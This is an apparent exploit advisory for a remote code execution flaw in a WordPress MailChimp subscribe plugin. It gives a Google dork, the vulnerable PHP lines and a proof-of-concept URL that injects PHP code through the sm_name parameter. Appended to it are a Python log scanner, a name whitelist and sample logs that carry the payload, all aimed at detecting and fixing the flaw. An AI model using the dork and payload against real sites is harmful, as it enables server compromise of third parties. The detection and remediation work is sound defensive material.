@CCrashBandicot
Created March 31, 2016 01:45
# Exploit Title: WordPress Plugin MailChimp Subscribe Forms - Remote Code Execution
# Date: 23-03-2016
# Exploit Author: CrashBandicot
# Google Dork: inurl:/wp-content/plugins/mailchimp-subscribe-sm/
# Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/
# Tested on: MSWin32
# Version: 1.1
# Vulnerability: unvalidated GET parameter
# Submit an email address through the subscribe form, but add the parameter sm_name containing PHP code to the URL.
# Only sm_email is validated; sm_name is appended as-is to a .php file, so the injected code runs when that file is requested.
# Vulnerable File: mailchimp-subscribe-sm/inc/store-address.php
18. if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$/i", $_GET['sm_email'])) {
...
23. $smf_data = '* Name : '.$_GET['sm_name'];
24. $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL;
...
36. $file = "sm_subscribers_list.php";
...
39. $fp = fopen($file, "a");
40. fwrite($fp, $smf_data);
...
42. fclose($fp);
# PoC: localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe
# Result: the PHP code is stored in the file sm_subscribers_list.php
# Screenshot: http://i.imgur.com/HHtuycC.png
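Defender-side checks for the flaw above, added here as an example; this is not code from the gist or from the plugin. It shows a whitelist for sm_name (an assumed hardening rule, in the spirit of the plugin's own sm_email regex), a scanner over constructed access-log lines that flags PHP open tags in sm_name and direct reads of the generated sm_subscribers_list.php, and a forensic check of that file's records. The IPs, log lines, list contents and the directory in the third log line are constructed; detection keys only on the parameter name and the file name that appear on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed whitelist for sm_name (the plugin validates only sm_email): a leading word
# character, then letters/digits/underscore, spaces, dots, apostrophes or hyphens, <= 64 chars.
NAME_RE = re.compile(r"[\w][\w .'-]{0,63}")

# Markers that must never reach a file with a .php extension inside the webroot.
PHP_MARKERS = ("<?", "<script")

# Combined-format request line (ip, method, target, status); the sample lines are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_safe_name(name: str) -> bool:
    """True if sm_name matches the whitelist; reject before anything is written to disk."""
    return NAME_RE.fullmatch(name) is not None


def contains_php(value: str) -> bool:
    """True if the value carries a PHP or script open tag."""
    low = value.lower()
    return any(marker in low for marker in PHP_MARKERS)


def scan_log(text: str) -> list:
    """Flag subscribe requests whose sm_name carries code (or fails the whitelist)
    and direct reads of the file the plugin appends to."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        params = parse_qs(parts.query)  # percent-decodes and turns '+' into spaces
        if parts.path.endswith("/sm_subscribers_list.php"):
            findings.append({"ip": m["ip"], "reason": "subscriber_list_fetched"})
            continue
        for name in params.get("sm_name", []):
            if contains_php(name):
                findings.append({"ip": m["ip"], "reason": "php_code_in_sm_name"})
            elif not is_safe_name(name):
                findings.append({"ip": m["ip"], "reason": "invalid_sm_name"})
    return findings


def injected_lines(subscriber_list: str) -> list:
    """1-based line numbers of records in sm_subscribers_list.php that carry PHP tags.
    The plugin writes one record per line: '* Name : <name> Email : <email> , '."""
    return [i for i, line in enumerate(subscriber_list.splitlines(), 1) if contains_php(line)]


# Constructed sample data; the inc/ directory in the third line is an assumption.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Mar/2016:10:01:02 +0000] "GET /subscribe/?sm_email=alice%40example.org&sm_name=Alice&submit=subscribe HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Mar/2016:10:02:17 +0000] "GET /subscribe/?sm_email=0day%400day.com&sm_name=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E&submit=subscribe HTTP/1.1" 200 512 "-" "curl/7.47.0"
198.51.100.7 - - [23/Mar/2016:10:03:40 +0000] "GET /wp-content/plugins/mailchimp-subscribe-sm/inc/sm_subscribers_list.php HTTP/1.1" 200 2048 "-" "curl/7.47.0"
"""

SAMPLE_LIST = (
    "* Name : Alice Email : alice@example.org , \n"
    "* Name : <?php phpinfo(); ?> Email : 0day@0day.com , \n"
)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}: {f['reason']}")
    print("injected records at lines:", injected_lines(SAMPLE_LIST))
```

The whitelist is defense in depth; the root cause is that user input is appended to a file with a .php extension inside the webroot. The durable fix is to store subscriber data outside the webroot (or in a non-executable format such as a database table) and to validate sm_name the way sm_email already is. On a host where the plugin was installed, a non-empty result from injected_lines over the existing sm_subscribers_list.php is a strong indicator that the flaw was exercised.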